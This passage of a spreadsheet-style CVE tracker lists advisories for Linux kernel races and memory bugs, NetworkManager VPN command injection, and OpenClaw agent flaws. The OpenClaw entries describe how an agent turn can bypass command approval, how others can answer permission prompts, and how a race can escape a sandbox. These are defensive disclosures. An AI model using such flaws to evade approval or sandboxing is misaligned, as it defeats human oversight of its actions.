runs from rds_tcp_accept_one() on the single-threaded krdsd workqueue
and holds rds_tcp_accept_lock and t_conn_path_lock while it waits, so
a duelling SYN accepted while its path is being torn down parks
accept processing for the duration of the teardown - for TCP bounded
by the (up to 5 s) drain loop in rds_tcp_conn_path_shutdown().  An IB
path's drain in rds_ib_conn_path_shutdown() has no round cap, but no
blocking waiter either: rds_tcp_reset_callbacks() is the only blocking
acquirer of these bits and waits only on its own TCP path, and the
fastpaths are trylock-and-back-off on both transports, so a long IB
drain lengthens only that path's own quiesce.  The
window is narrow: the accept-side state check has to pass before the
teardown moves the path to RDS_CONN_DISCONNECTING.
Because krdsd is a single global workqueue, everything else queued
there - accept processing for other connections and network
namespaces, and the flush_workqueue(rds_wq) in rds_tcp_listen_stop()
during namespace teardown - waits behind the parked accept worker for
that time.  It cannot deadlock, although the waits do point at each
other: the teardown blocks until the bit's holder releases it, and
the holder may be that krdsd accept worker.  The holder finishes
without needing anything the teardown owns: the sync cancels
rds_tcp_reset_callbacks() issues target cp_send_w and cp_recv_w on
the path's ordered cp_wq, whose only execution slot is occupied by
the blocked cp_down_w itself, so they are pending at most and cancel
without flushing - a reliance on cp_wq being ordered that is now
noted next to those cancels (on 
---truncated---</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98069</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98070</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr"/>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire RDS_IN_XMIT in rds_tcp_reset_callbacks()
rds_tcp_reset_callbacks() quiesces the transmit path by setting the
path state to RDS_CONN_RESETTING and then waiting for RDS_IN_XMIT to
be sampled clear before swapping the underlying socket and calling
rds_send_path_reset().
Sampling the bit clear is not the same as owning it: rds_send_xmit()
can re-acquire RDS_IN_XMIT right after the wait_event() returns.  Its
state recheck after taking the lock is a store-buffering pattern (the
resetter writes the state and reads the bit, the sender writes the
bit and reads the state) and acquire_in_xmit() is only an acquire
operation, so on weakly ordered architectures both sides can miss
each other's write and the transmit path then runs concurrently with
rds_send_path_reset() rewriting cp_xmit_* state - which is exactly
what the comment above rds_send_path_reset() tells its callers to
prevent.
Take the lock instead, hold it across the socket swap and
rds_send_path_reset(), and release it with a wake-up at the end.  The
lock-ordering constraint documented above the wait still holds: the
lock is acquired before lock_sock(), so a sender inside tcp_sendmsg()
can never be waited on while we hold the socket lock.
Two details of the old code go away with the same change:
 - t_sock is now read only after the lock is acquired.  The old code
   cached it before waiting; the teardown in rds_conn_shutdown()
   releases that socket and clears t_sock, so a pointer cached before
   the wait can be stale by the time the accept path resumes.  Reading
   it under RDS_IN_XMIT is what makes the exclusion complete once the
   teardown owns the same lock, which the next patch arranges; until
   then the teardown still only samples the bit, and the two paths
   remain as exposed to each other as they are today.
 - The old !osock early path called rds_send_path_reset() with no
   serialization at all.  It now runs under the lock like the normal
   path.  The conditional RDS_CONN_RESETTING transition of the
   previous patch happens before the socket check either way: a path
   found without a socket is either still connecting (its reconnect
   worker blocked on t_conn_path_lock) and legitimately goes
   RESETTING -&gt; UP on the new socket, or it has been torn down
   meanwhile and is dropped.
The in-function comment describing the old wait-based quiesce is
rewritten to describe the lock-based one, and the stale block comment
above the function (which still described a return value and an
incomplete list of t_sock writers) is refreshed to name all four
writers - the connect, accept, teardown and swap paths - and what
serializes each of them.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98070</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100561</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.22 and &lt; 2026.8.1 contain an approval-bypass flaw in the exec approval policy: the policy could trust a command-running wrapper without inspecting the command carried in its arguments. After an operator allowlisted or permanently approved a benign wrapper invocation, a later agent turn could substitute an arbitrary inner command and execute it with the OpenClaw process's host privileges without a further approval prompt. Exploitation requires the relevant wrapper to resolve on the host and a prior operator decision allowing that wrapper. Transparent shell carriers and opaque utilities such as process monitors, tracers, namespace tools, and proxy wrappers were affected through related trust-resolution gaps. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100561</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100585</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to enforce the owner-only authorization requirement for Claude Code permission prompts delivered through the MCP channel bridge. An authorized non-owner channel sender with channel command access can approve or deny a pending permission request intended for the owner, causing the requested action to proceed without owner consent. The practical impact depends on the pending action and the host capabilities requested by the Claude Code run. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100585</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100570</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>npm, python, rust</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 allow an untrusted workspace .env file to set the CLOUDSDK_PYTHON_ARGS environment variable. When an operator starts OpenClaw in attacker-controlled workspace content and then runs the Gmail setup flow, that value is inherited when gcloud is launched, and the gcloud launcher passes it as arguments to the trusted Python interpreter. A crafted CLOUDSDK_PYTHON_ARGS value can therefore cause Python to execute attacker-supplied code with the OpenClaw host user's permissions, allowing credentials to be read, files to be modified, or other processes to be started. This issue is fixed in version 2026.8.1; as a workaround, run Gmail setup only from trusted workspaces and clear inherited CLOUDSDK_* variables beforehand.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100570</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100597</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 is vulnerable to a time-of-check time-of-use race condition in OpenShell local mirror filesystem mutation operations. The remove, mkdir, and rename operations could act on a different filesystem target after OpenClaw completed its sandbox path-safety check, if the path is changed concurrently. An attacker able to win the race can cause a sandboxed operation to delete, create, or rename a host path outside the intended mirror root with the permissions of the OpenClaw process user. This does not require an operator to have granted host filesystem access outside the sandbox. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100597</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91837</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-iodine, the iodine VPN plugin for NetworkManager. A local unprivileged user can exploit a vulnerability in how the 'nameserver' setting is processed when establishing an iodine VPN connection. By embedding shell metacharacters (special characters that can execute commands) in the 'nameserver' value, an attacker can inject and execute arbitrary commands. These commands run with root privileges before the application drops its elevated permissions, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91837</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91838</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-sstp, the SSTP VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by embedding special characters, known as shell metacharacters, into VPN connection profile fields such as CA certificate or proxy settings. These unescaped characters are then processed by the `pppd` daemon, which runs with root privileges, allowing the attacker to execute arbitrary commands with elevated permissions when a malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91838</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91839</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-fortisslvpn, the FortiSSLVPN plugin for NetworkManager. The nm-fortisslvpn-service improperly handles carriage-return/line-feed (CR/LF) characters in VPN connection profile credentials. A local unprivileged user can exploit this by crafting a malicious VPN profile to inject additional configuration directives. This can lead to arbitrary code execution with root privileges when the crafted VPN connection is activated.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91839</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91841</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc, a VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by injecting a newline character into the CA-File path. This manipulation allows the user to execute arbitrary commands as the root user, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91841</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97580</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: bound HEVC tile loops and PPS id to the array capacity
compute_tiles_uniform() and compute_tiles_non_uniform() loop over
num_tile_columns_minus1 + 1 / num_tile_rows_minus1 + 1 entries, and
assemble_hw_pps() writes one COLUMN_WIDTH / ROW_HEIGHT register per tile
and indexes priv_tbl-&gt;param_set[] by pic_parameter_set_id, all taken from
the untrusted PPS. Use the bounded v4l2_hevc_pps_num_tile_columns() /
v4l2_hevc_pps_num_tile_rows() helpers for the tile loops, and bail out of
assemble_hw_pps() before indexing priv_tbl-&gt;param_set[] with an
out-of-range pic_parameter_set_id, so the writes stay within the hardware
tables.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97580</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97594</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Fix use-after-free of the source's parent directory
current_check_refer_path() reads old_dentry-&gt;d_parent without holding a
reference nor a lock on it, and then dereferences it in
collect_domain_accesses() and in the audit record.
A reference on a child does not pin its parent: __d_move() reassigns
dentry-&gt;d_parent and drops the reference the child held on its former
parent.  hook_path_rename() is not affected because the rename path
calls lock_rename() before the hook, so the source cannot be reparented
under it.  hook_path_link() has no such protection: filename_linkat()
holds a reference on the source dentry but neither locks nor references
its parent, so a concurrent rename(2) can reparent the source while
security_path_link() runs, and the former parent can then be removed and
freed while the hook walks it.
A process can trigger this after entering a Landlock domain that handles
at least one filesystem access right.  The process can then race a
linkat(2) loop against rename(2) and rmdir(2):
  BUG: KASAN: slab-use-after-free in collect_domain_accesses+0x278/0x290
  Read of size 4 at addr ffff888160bd53f4 by task llrepro2/549
   collect_domain_accesses+0x278/0x290
   current_check_refer_path+0x952/0x1120
   security_path_link+0x1be/0x320
   filename_linkat+0x342/0x6d0
   __x64_sys_linkat+0xfa/0x150
  Freed by task 562:
   kmem_cache_free+0x139/0x4c0
   i_callback+0x4b/0x80
   rcu_core+0x7dc/0x10a0
Take a reference on the dentry selected as the source parent, using
dget() for the common-mount-root case and dget_parent() otherwise.
Release it after the hierarchy walk and synchronous audit logging.
[mic: Clarify the caller, reachability, and reference handling]</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97594</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97602</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inet: frags: invalidate queues before flushing them
fqdir_pre_exit() flushes the skbs from incomplete queues without
changing their completion state. A fragment which found a queue before
high_thresh was cleared can then acquire the queue lock and reuse stale
reassembly metadata. A queue concurrently killed after fqdir-&gt;dead is
set can instead become INET_FRAG_COMPLETE|INET_FRAG_HASH_DEAD while
still holding its old skbs; skipping it because it is complete leaves
those references behind until asynchronous fqdir teardown.
For IPv6, stale metadata can make ip6_frag_reasm() use the old
nhoffset with a new skb and access memory out of bounds. The resulting
heap corruption can be leveraged for local privilege escalation when
unprivileged network namespaces are available. Unflushed fragments can
also keep conntrack references alive after the conntrack per-net
cleanup point.
Kill each incomplete queue, then flush every queue still owned by the
dying rhashtable. HASH_DEAD identifies that ownership, while complete
queues without it are already owned by another destroy path and must be
left alone. Releasing a timer reference removed by inet_frag_kill() is
deferred to inet_frag_putn(), after the queue lock is dropped.
KASAN report:
  BUG: KASAN: slab-out-of-bounds in ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  Write of size 1 at addr ff110001039c6e00 by task poc/771
  Call Trace:
  ? ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:479 (discriminator 5))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
